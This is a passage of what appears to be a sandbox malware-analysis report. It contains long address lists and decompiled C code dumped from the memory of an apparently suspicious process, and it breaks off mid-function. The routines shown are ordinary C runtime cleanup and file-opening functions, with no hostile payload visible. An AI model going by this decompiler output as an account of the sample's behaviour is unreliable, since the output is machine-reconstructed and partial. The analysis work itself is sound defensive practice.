                                                                                                                                      0x01319f7c
                                                                                                                                      0x01319f7d
                                                                                                                                      0x01319f80
                                                                                                                                      0x01319f82
                                                                                                                                      0x01319f8b
                                                                                                                                      0x01319f8c
                                                                                                                                      0x01319f8e
                                                                                                                                      0x01319f90
                                                                                                                                      0x01319f92
                                                                                                                                      0x01319f95
                                                                                                                                      0x01319f96
                                                                                                                                      0x01319f98
                                                                                                                                      0x01319f9a
                                                                                                                                      0x01319f9a
                                                                                                                                      0x01319f9d
                                                                                                                                      0x01319f9e
                                                                                                                                      0x01319f9e
                                                                                                                                      0x01319f9a
                                                                                                                                      0x01319fa2
                                                                                                                                      0x01319fad
                                                                                                                                      0x01319fb1
                                                                                                                                      0x01319fb3
                                                                                                                                      0x0131a021
                                                                                                                                      0x0131a021
                                                                                                                                      0x00000000
                                                                                                                                      0x01319fb5
                                                                                                                                      0x01319fb5
                                                                                                                                      0x01319fb7
                                                                                                                                      0x0131a011
                                                                                                                                      0x0131a012
                                                                                                                                      0x0131a018
                                                                                                                                      0x00000000
                                                                                                                                      0x01319fb9
                                                                                                                                      0x01319fbb
                                                                                                                                      0x01319fbb
                                                                                                                                      0x01319fbd
                                                                                                                                      0x01319fbd
                                                                                                                                      0x01319fbf
                                                                                                                                      0x01319fbf
                                                                                                                                      0x01319fc2
                                                                                                                                      0x01319fc2
                                                                                                                                      0x01319fc5
                                                                                                                                      0x01319fc8
                                                                                                                                      0x01319fc8
                                                                                                                                      0x01319fd4
                                                                                                                                      0x01319fd8
                                                                                                                                      0x01319fe0
                                                                                                                                      0x01319fe6
                                                                                                                                      0x01319feb
                                                                                                                                      0x01319fee
                                                                                                                                      0x01319ff2
                                                                                                                                      0x00000000
                                                                                                                                      0x01319ff4
                                                                                                                                      0x01319ffc
                                                                                                                                      0x0131a001
                                                                                                                                      0x0131a004
                                                                                                                                      0x0131a006
                                                                                                                                      0x0131a026
                                                                                                                                      0x0131a028
                                                                                                                                      0x0131a029
                                                                                                                                      0x0131a02a
                                                                                                                                      0x0131a02b
                                                                                                                                      0x0131a02c
                                                                                                                                      0x0131a02d
                                                                                                                                      0x0131a032
                                                                                                                                      0x0131a035
                                                                                                                                      0x0131a038
                                                                                                                                      0x0131a039
                                                                                                                                      0x0131a03a
                                                                                                                                      0x0131a03b
                                                                                                                                      0x0131a041
                                                                                                                                      0x0131a043
                                                                                                                                      0x0131a046
                                                                                                                                      0x0131a072
                                                                                                                                      0x0131a072
                                                                                                                                      0x0131a072
                                                                                                                                      0x0131a077
                                                                                                                                      0x0131a048
                                                                                                                                      0x0131a048
                                                                                                                                      0x0131a04b
                                                                                                                                      0x0131a051
                                                                                                                                      0x0131a056
                                                                                                                                      0x0131a059
                                                                                                                                      0x0131a05b
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a05d
                                                                                                                                      0x0131a05f
                                                                                                                                      0x0131a062
                                                                                                                                      0x0131a064
                                                                                                                                      0x0131a080
                                                                                                                                      0x0131a082
                                                                                                                                      0x0131a066
                                                                                                                                      0x0131a066
                                                                                                                                      0x0131a068
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a068
                                                                                                                                      0x0131a064
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a06a
                                                                                                                                      0x0131a06a
                                                                                                                                      0x0131a06d
                                                                                                                                      0x0131a06d
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a04b
                                                                                                                                      0x0131a079
                                                                                                                                      0x0131a07f
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a006
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a008
                                                                                                                                      0x0131a008
                                                                                                                                      0x0131a00b
                                                                                                                                      0x0131a00b
                                                                                                                                      0x0131a00f
                                                                                                                                      0x0131a00f
                                                                                                                                      0x00000000
                                                                                                                                      0x0131a00f
                                                                                                                                      0x01319fb7
                                                                                                                                      0x01319f84
                                                                                                                                      0x01319f84
                                                                                                                                      0x0131a01c
                                                                                                                                      0x0131a020
                                                                                                                                      0x0131a020
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01319f49
                                                                                                                                      0x00000000
                                                                                                                                      0x01319f4b
                                                                                                                                      0x01319f4b
                                                                                                                                      0x01319f4e
                                                                                                                                      0x01319f4e
                                                                                                                                      0x00000000
                                                                                                                                      0x01319f52
                                                                                                                                      0x01319f01
                                                                                                                                      0x01319ed2
                                                                                                                                      0x01319ed2
                                                                                                                                      0x01319f5e
                                                                                                                                      0x01319f62
                                                                                                                                      0x01319f62
                                                                                                                                      0x01319e7c
                                                                                                                                      0x01319e80
                                                                                                                                      0x01319e83
                                                                                                                                      0x01319e8d
                                                                                                                                      0x01319e95
                                                                                                                                      0x01319e9b
                                                                                                                                      0x01319e9d
                                                                                                                                      0x01319e9f
                                                                                                                                      0x01319ea4
                                                                                                                                      0x01319ea4
                                                                                                                                      0x01319ea7
                                                                                                                                      0x01319ea7
                                                                                                                                      0x00000000
                                                                                                                                      0x01319e9d
                                                                                                                                      0x01319e7a
                                                                                                                                      0x01319e66
                                                                                                                                      0x01319e38
                                                                                                                                      0x01319d99
                                                                                                                                      0x01319cf4
                                                                                                                                      0x01319cf4
                                                                                                                                      0x01319cf9
                                                                                                                                      0x01319cfc
                                                                                                                                      0x01319d29
                                                                                                                                      0x01319d29
                                                                                                                                      0x01319d2b
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d2d
                                                                                                                                      0x01319d2d
                                                                                                                                      0x01319d2f
                                                                                                                                      0x01319d5a
                                                                                                                                      0x01319d64
                                                                                                                                      0x01319d69
                                                                                                                                      0x01319d6e
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d31
                                                                                                                                      0x01319d3b
                                                                                                                                      0x01319d40
                                                                                                                                      0x01319d45
                                                                                                                                      0x01319d48
                                                                                                                                      0x01319d4e
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d50
                                                                                                                                      0x01319d50
                                                                                                                                      0x01319d56
                                                                                                                                      0x01319d58
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d58
                                                                                                                                      0x01319d4e
                                                                                                                                      0x01319d2f
                                                                                                                                      0x01319cfe
                                                                                                                                      0x01319cfe
                                                                                                                                      0x01319d00
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d02
                                                                                                                                      0x01319d02
                                                                                                                                      0x01319d07
                                                                                                                                      0x01319d09
                                                                                                                                      0x01319d71
                                                                                                                                      0x01319d71
                                                                                                                                      0x01319d77
                                                                                                                                      0x01319d79
                                                                                                                                      0x01319d16
                                                                                                                                      0x01319d16
                                                                                                                                      0x01319d16
                                                                                                                                      0x01319d19
                                                                                                                                      0x01319d1a
                                                                                                                                      0x01319d21
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01319d09
                                                                                                                                      0x01319d00
                                                                                                                                      0x01319cfc
                                                                                                                                      0x01319cee
                                                                                                                                      0x01319cbe
                                                                                                                                      0x01319c97
                                                                                                                                      0x01319c97
                                                                                                                                      0x01319c9c
                                                                                                                                      0x01319ca2
                                                                                                                                      0x01319d24
                                                                                                                                      0x01319d28
                                                                                                                                      0x01319d28
                                                                                                                                      0x01319c3c
                                                                                                                                      0x01319c45
                                                                                                                                      0x01319c4d
                                                                                                                                      0x01319c51
                                                                                                                                      0x01319c58
                                                                                                                                      0x01319c5e
                                                                                                                                      0x01319c60
                                                                                                                                      0x01319c62
                                                                                                                                      0x01319c67
                                                                                                                                      0x01319c67
                                                                                                                                      0x01319c6a
                                                                                                                                      0x01319c6a
                                                                                                                                      0x00000000
                                                                                                                                      0x01319c60
                                                                                                                                      0x01319c3a
                                                                                                                                      0x01319c27
                                                                                                                                      0x01319bff
                                                                                                                                      0x01319b60
                                                                                                                                      0x01319ab9
                                                                                                                                      0x01319ab9
                                                                                                                                      0x01319abc
                                                                                                                                      0x01319aed
                                                                                                                                      0x01319aed
                                                                                                                                      0x01319aef
                                                                                                                                      0x01319aff
                                                                                                                                      0x01319b04
                                                                                                                                      0x01319b09
                                                                                                                                      0x01319b0f
                                                                                                                                      0x01319b12
                                                                                                                                      0x01319b14
                                                                                                                                      0x00000000
                                                                                                                                      0x01319b16
                                                                                                                                      0x01319b16
                                                                                                                                      0x01319b1c
                                                                                                                                      0x00000000
                                                                                                                                      0x01319b1e
                                                                                                                                      0x01319b28
                                                                                                                                      0x01319b2d
                                                                                                                                      0x01319b32
                                                                                                                                      0x01319b35
                                                                                                                                      0x01319b3b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01319b3b
                                                                                                                                      0x01319b1c
                                                                                                                                      0x01319af1
                                                                                                                                      0x01319af1
                                                                                                                                      0x00000000
                                                                                                                                      0x01319af1
                                                                                                                                      0x01319abe
                                                                                                                                      0x01319abe
                                                                                                                                      0x01319ac4
                                                                                                                                      0x00000000
                                                                                                                                      0x01319ac6
                                                                                                                                      0x01319ac6
                                                                                                                                      0x01319acb
                                                                                                                                      0x01319acd
                                                                                                                                      0x01319b3d
                                                                                                                                      0x01319b3d
                                                                                                                                      0x01319b43
                                                                                                                                      0x01319b43
                                                                                                                                      0x01319b45
                                                                                                                                      0x01319ada
                                                                                                                                      0x01319ada
                                                                                                                                      0x01319ada
                                                                                                                                      0x01319add
                                                                                                                                      0x01319ade
                                                                                                                                      0x01319ae5
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01319acd
                                                                                                                                      0x01319ac4
                                                                                                                                      0x01319abc
                                                                                                                                      0x01319ab3
                                                                                                                                      0x01319a83
                                                                                                                                      0x01319a5c
                                                                                                                                      0x01319a5c
                                                                                                                                      0x01319a61
                                                                                                                                      0x01319a67
                                                                                                                                      0x01319ae8
                                                                                                                                      0x01319aec
                                                                                                                                      0x01319aec
                                                                                                                                      0x00000000

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2719235668-0
                                                                                                                                      • Opcode ID: 6d96e7d07377dc19b12c773f3249dad7361765daf9c09d559cb33ac45e1893b8
                                                                                                                                      • Instruction ID: 267c3d9ad23780ad4377676d5688f58bf54439e99232e33acc86bea1caea4839
                                                                                                                                      • Opcode Fuzzy Hash: 6d96e7d07377dc19b12c773f3249dad7361765daf9c09d559cb33ac45e1893b8
                                                                                                                                      • Instruction Fuzzy Hash: 9CD11A72D00205AFEF3DAF7C9860B6A7BE8AF0572CF44816DE9459728DEB3595048790
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E0131AE1C(intOrPtr _a4) {
                                                                                                                                      				intOrPtr _v8;
                                                                                                                                      				intOrPtr _t25;
                                                                                                                                      				intOrPtr* _t26;
                                                                                                                                      				intOrPtr _t28;
                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                      				intOrPtr* _t31;
                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                      				intOrPtr* _t46;
                                                                                                                                      				intOrPtr* _t47;
                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                      				intOrPtr* _t70;
                                                                                                                                      				intOrPtr _t74;
                                                                                                                                      
                                                                                                                                      				_t74 = _a4;
                                                                                                                                      				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                                                                      				if(_t25 != 0 && _t25 != 0x132e7e8) {
                                                                                                                                      					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                                                                      					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                                                                      						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                                                                      						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                                                                      							E01314615(_t46);
                                                                                                                                      							E0131A9FB( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                      						}
                                                                                                                                      						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                      						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                      							E01314615(_t47);
                                                                                                                                      							E0131AAF9( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                      						}
                                                                                                                                      						E01314615( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                      						E01314615( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                      				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                      					E01314615( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                      					E01314615( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                      					E01314615( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                      					E01314615( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                      				}
                                                                                                                                      				E0131AF8F( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                      				_t28 = 6;
                                                                                                                                      				_t55 = _t74 + 0xa0;
                                                                                                                                      				_v8 = _t28;
                                                                                                                                      				_t70 = _t74 + 0x28;
                                                                                                                                      				do {
                                                                                                                                      					if( *((intOrPtr*)(_t70 - 8)) != 0x132e1e0) {
                                                                                                                                      						_t31 =  *_t70;
                                                                                                                                      						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                      							E01314615(_t31);
                                                                                                                                      							E01314615( *_t55);
                                                                                                                                      						}
                                                                                                                                      						_t28 = _v8;
                                                                                                                                      					}
                                                                                                                                      					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                      						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                      						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                      							E01314615(_t29);
                                                                                                                                      						}
                                                                                                                                      						_t28 = _v8;
                                                                                                                                      					}
                                                                                                                                      					_t55 = _t55 + 4;
                                                                                                                                      					_t70 = _t70 + 0x10;
                                                                                                                                      					_t28 = _t28 - 1;
                                                                                                                                      					_v8 = _t28;
                                                                                                                                      				} while (_t28 != 0);
                                                                                                                                      				return E01314615(_t74);
                                                                                                                                      			}















                                                                                                                                      0x0131ae24
                                                                                                                                      0x0131ae28
                                                                                                                                      0x0131ae30
                                                                                                                                      0x0131ae39
                                                                                                                                      0x0131ae3e
                                                                                                                                      0x0131ae45
                                                                                                                                      0x0131ae4d
                                                                                                                                      0x0131ae55
                                                                                                                                      0x0131ae60
                                                                                                                                      0x0131ae66
                                                                                                                                      0x0131ae67
                                                                                                                                      0x0131ae6f
                                                                                                                                      0x0131ae77
                                                                                                                                      0x0131ae82
                                                                                                                                      0x0131ae88
                                                                                                                                      0x0131ae8c
                                                                                                                                      0x0131ae97
                                                                                                                                      0x0131ae9d
                                                                                                                                      0x0131ae3e
                                                                                                                                      0x0131ae9e
                                                                                                                                      0x0131aea6
                                                                                                                                      0x0131aeb9
                                                                                                                                      0x0131aecc
                                                                                                                                      0x0131aeda
                                                                                                                                      0x0131aee5
                                                                                                                                      0x0131aeea
                                                                                                                                      0x0131aef3
                                                                                                                                      0x0131aefb
                                                                                                                                      0x0131aefc
                                                                                                                                      0x0131af02
                                                                                                                                      0x0131af05
                                                                                                                                      0x0131af08
                                                                                                                                      0x0131af0f
                                                                                                                                      0x0131af11
                                                                                                                                      0x0131af15
                                                                                                                                      0x0131af1d
                                                                                                                                      0x0131af24
                                                                                                                                      0x0131af2a
                                                                                                                                      0x0131af2b
                                                                                                                                      0x0131af2b
                                                                                                                                      0x0131af32
                                                                                                                                      0x0131af34
                                                                                                                                      0x0131af39
                                                                                                                                      0x0131af41
                                                                                                                                      0x0131af46
                                                                                                                                      0x0131af47
                                                                                                                                      0x0131af47
                                                                                                                                      0x0131af4a
                                                                                                                                      0x0131af4d
                                                                                                                                      0x0131af50
                                                                                                                                      0x0131af53
                                                                                                                                      0x0131af53
                                                                                                                                      0x0131af65

                                                                                                                                      APIs
                                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0131AE60
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA18
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA2A
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA3C
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA4E
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA60
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA72
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA84
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AA96
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AAA8
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AABA
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AACC
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AADE
                                                                                                                                        • Part of subcall function 0131A9FB: _free.LIBCMT ref: 0131AAF0
                                                                                                                                      • _free.LIBCMT ref: 0131AE55
                                                                                                                                        • Part of subcall function 01314615: HeapFree.KERNEL32(00000000,00000000,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?), ref: 0131462B
                                                                                                                                        • Part of subcall function 01314615: GetLastError.KERNEL32(?,?,0131AB90,?,00000000,?,00000000,?,0131ABB7,?,00000007,?,?,0131AFB4,?,?), ref: 0131463D
                                                                                                                                      • _free.LIBCMT ref: 0131AE77
                                                                                                                                      • _free.LIBCMT ref: 0131AE8C
                                                                                                                                      • _free.LIBCMT ref: 0131AE97
                                                                                                                                      • _free.LIBCMT ref: 0131AEB9
                                                                                                                                      • _free.LIBCMT ref: 0131AECC
                                                                                                                                      • _free.LIBCMT ref: 0131AEDA
                                                                                                                                      • _free.LIBCMT ref: 0131AEE5
                                                                                                                                      • _free.LIBCMT ref: 0131AF1D
                                                                                                                                      • _free.LIBCMT ref: 0131AF24
                                                                                                                                      • _free.LIBCMT ref: 0131AF41
                                                                                                                                      • _free.LIBCMT ref: 0131AF59
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                      • Opcode ID: 2dab3c6ac9eef5c7c5d3af52da0cc8556466bf4dd825bbe6b1fb116491fc6484
                                                                                                                                      • Instruction ID: 9354900751cfcf9ce1a003fafd15664a6ce3b15c7c032d5a686f005734b2acf0
                                                                                                                                      • Opcode Fuzzy Hash: 2dab3c6ac9eef5c7c5d3af52da0cc8556466bf4dd825bbe6b1fb116491fc6484
                                                                                                                                      • Instruction Fuzzy Hash: FE319071605342DFEB29AA3CDC44B5AB7E8EF4072DF184829E588D7199DF31E884CB24
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 42%
                                                                                                                                      			E0131EB42(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                      				signed int _v5;
                                                                                                                                      				char _v6;
                                                                                                                                      				void* _v12;
                                                                                                                                      				signed int _v16;
                                                                                                                                      				signed int _v20;
                                                                                                                                      				char _v24;
                                                                                                                                      				intOrPtr _v36;
                                                                                                                                      				signed int _v44;
                                                                                                                                      				void _v48;
                                                                                                                                      				char _v72;
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				signed int _t114;
                                                                                                                                      				signed int _t123;
                                                                                                                                      				signed char _t124;
                                                                                                                                      				signed int _t134;
                                                                                                                                      				intOrPtr _t164;
                                                                                                                                      				intOrPtr _t180;
                                                                                                                                      				void* _t190;
                                                                                                                                      				signed int* _t191;
                                                                                                                                      				signed int _t193;
                                                                                                                                      				char _t198;
                                                                                                                                      				signed int _t204;
                                                                                                                                      				signed int _t207;
                                                                                                                                      				signed int _t216;
                                                                                                                                      				signed int _t218;
                                                                                                                                      				signed int _t220;
                                                                                                                                      				signed int _t226;
                                                                                                                                      				signed int _t228;
                                                                                                                                      				signed int _t235;
                                                                                                                                      				signed int _t236;
                                                                                                                                      				signed int _t238;
                                                                                                                                      				signed int _t240;
                                                                                                                                      				signed char _t243;
                                                                                                                                      				intOrPtr _t246;
                                                                                                                                      				void* _t249;
                                                                                                                                      				void* _t253;
                                                                                                                                      				void* _t263;
                                                                                                                                      				signed int _t264;
                                                                                                                                      				signed int _t267;
                                                                                                                                      				signed int _t270;
                                                                                                                                      				signed int _t271;
                                                                                                                                      				void* _t273;
                                                                                                                                      				void* _t275;
                                                                                                                                      				void* _t276;
                                                                                                                                      				void* _t278;
                                                                                                                                      				void* _t279;
                                                                                                                                      				void* _t281;
                                                                                                                                      				void* _t285;
                                                                                                                                      
                                                                                                                                      				_t263 = E0131E8A5(__ecx,  &_v72, _a16, _a20, _a24);
                                                                                                                                      				_t193 = 6;
                                                                                                                                      				memcpy( &_v48, _t263, _t193 << 2);
                                                                                                                                      				_t275 = _t273 + 0x1c;
                                                                                                                                      				_t249 = _t263 + _t193 + _t193;
                                                                                                                                      				_t264 = _t263 | 0xffffffff;
                                                                                                                                      				if(_v36 != _t264) {
                                                                                                                                      					_t114 = E0131A7C7(_t190, _t249, _t264, __eflags);
                                                                                                                                      					_t191 = _a8;
                                                                                                                                      					 *_t191 = _t114;
                                                                                                                                      					__eflags = _t114 - _t264;
                                                                                                                                      					if(_t114 != _t264) {
                                                                                                                                      						_v20 = _v20 & 0x00000000;
                                                                                                                                      						_v24 = 0xc;
                                                                                                                                      						_t276 = _t275 - 0x18;
                                                                                                                                      						 *_a4 = 1;
                                                                                                                                      						_push(6);
                                                                                                                                      						_v16 =  !(_a16 >> 7) & 1;
                                                                                                                                      						_push( &_v24);
                                                                                                                                      						_push(_a12);
                                                                                                                                      						memcpy(_t276,  &_v48, 1 << 2);
                                                                                                                                      						_t198 = 0;
                                                                                                                                      						_t253 = E0131E810();
                                                                                                                                      						_t278 = _t276 + 0x2c;
                                                                                                                                      						_v12 = _t253;
                                                                                                                                      						__eflags = _t253 - 0xffffffff;
                                                                                                                                      						if(_t253 != 0xffffffff) {
                                                                                                                                      							L11:
                                                                                                                                      							_t123 = GetFileType(_t253);
                                                                                                                                      							__eflags = _t123;
                                                                                                                                      							if(_t123 != 0) {
                                                                                                                                      								__eflags = _t123 - 2;
                                                                                                                                      								if(_t123 != 2) {
                                                                                                                                      									__eflags = _t123 - 3;
                                                                                                                                      									_t124 = _v48;
                                                                                                                                      									if(_t123 == 3) {
                                                                                                                                      										_t124 = _t124 | 0x00000008;
                                                                                                                                      										__eflags = _t124;
                                                                                                                                      									}
                                                                                                                                      								} else {
                                                                                                                                      									_t124 = _v48 | 0x00000040;
                                                                                                                                      								}
                                                                                                                                      								_v5 = _t124;
                                                                                                                                      								E0131A710(_t198,  *_t191, _t253);
                                                                                                                                      								_t243 = _v5 | 0x00000001;
                                                                                                                                      								_v5 = _t243;
                                                                                                                                      								_v48 = _t243;
                                                                                                                                      								 *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) = _t243;
                                                                                                                                      								_t204 =  *_t191;
                                                                                                                                      								_t206 = (_t204 & 0x0000003f) * 0x30;
                                                                                                                                      								__eflags = _a16 & 0x00000002;
                                                                                                                                      								 *((char*)( *((intOrPtr*)(0x132f128 + (_t204 >> 6) * 4)) + 0x29 + (_t204 & 0x0000003f) * 0x30)) = 0;
                                                                                                                                      								if((_a16 & 0x00000002) == 0) {
                                                                                                                                      									L20:
                                                                                                                                      									_v6 = 0;
                                                                                                                                      									_push( &_v6);
                                                                                                                                      									_push(_a16);
                                                                                                                                      									_t279 = _t278 - 0x18;
                                                                                                                                      									_t207 = 6;
                                                                                                                                      									_push( *_t191);
                                                                                                                                      									memcpy(_t279,  &_v48, _t207 << 2);
                                                                                                                                      									_t134 = E0131E5C3(_t191,  &_v48 + _t207 + _t207,  &_v48);
                                                                                                                                      									_t281 = _t279 + 0x30;
                                                                                                                                      									__eflags = _t134;
                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                      										 *((char*)( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x29 + ( *_t191 & 0x0000003f) * 0x30)) = _v6;
                                                                                                                                      										 *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30)) & 0x00000001;
                                                                                                                                      										__eflags = _v5 & 0x00000048;
                                                                                                                                      										if((_v5 & 0x00000048) == 0) {
                                                                                                                                      											__eflags = _a16 & 0x00000008;
                                                                                                                                      											if((_a16 & 0x00000008) != 0) {
                                                                                                                                      												_t226 =  *_t191;
                                                                                                                                      												_t228 = (_t226 & 0x0000003f) * 0x30;
                                                                                                                                      												_t164 =  *((intOrPtr*)(0x132f128 + (_t226 >> 6) * 4));
                                                                                                                                      												_t87 = _t164 + _t228 + 0x28;
                                                                                                                                      												 *_t87 =  *(_t164 + _t228 + 0x28) | 0x00000020;
                                                                                                                                      												__eflags =  *_t87;
                                                                                                                                      											}
                                                                                                                                      										}
                                                                                                                                      										_t267 = _v44;
                                                                                                                                      										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
                                                                                                                                      										if((_t267 & 0xc0000000) != 0xc0000000) {
                                                                                                                                      											L31:
                                                                                                                                      											__eflags = 0;
                                                                                                                                      											return 0;
                                                                                                                                      										} else {
                                                                                                                                      											__eflags = _a16 & 0x00000001;
                                                                                                                                      											if((_a16 & 0x00000001) == 0) {
                                                                                                                                      												goto L31;
                                                                                                                                      											}
                                                                                                                                      											CloseHandle(_v12);
                                                                                                                                      											_v44 = _t267 & 0x7fffffff;
                                                                                                                                      											_t216 = 6;
                                                                                                                                      											_push( &_v24);
                                                                                                                                      											_push(_a12);
                                                                                                                                      											memcpy(_t281 - 0x18,  &_v48, _t216 << 2);
                                                                                                                                      											_t246 = E0131E810();
                                                                                                                                      											__eflags = _t246 - 0xffffffff;
                                                                                                                                      											if(_t246 != 0xffffffff) {
                                                                                                                                      												_t218 =  *_t191;
                                                                                                                                      												_t220 = (_t218 & 0x0000003f) * 0x30;
                                                                                                                                      												__eflags = _t220;
                                                                                                                                      												 *((intOrPtr*)( *((intOrPtr*)(0x132f128 + (_t218 >> 6) * 4)) + _t220 + 0x18)) = _t246;
                                                                                                                                      												goto L31;
                                                                                                                                      											}
                                                                                                                                      											E01313C9B(GetLastError());
                                                                                                                                      											 *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x132f128 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
                                                                                                                                      											E0131A8D9( *_t191);
                                                                                                                                      											L10:
                                                                                                                                      											goto L2;
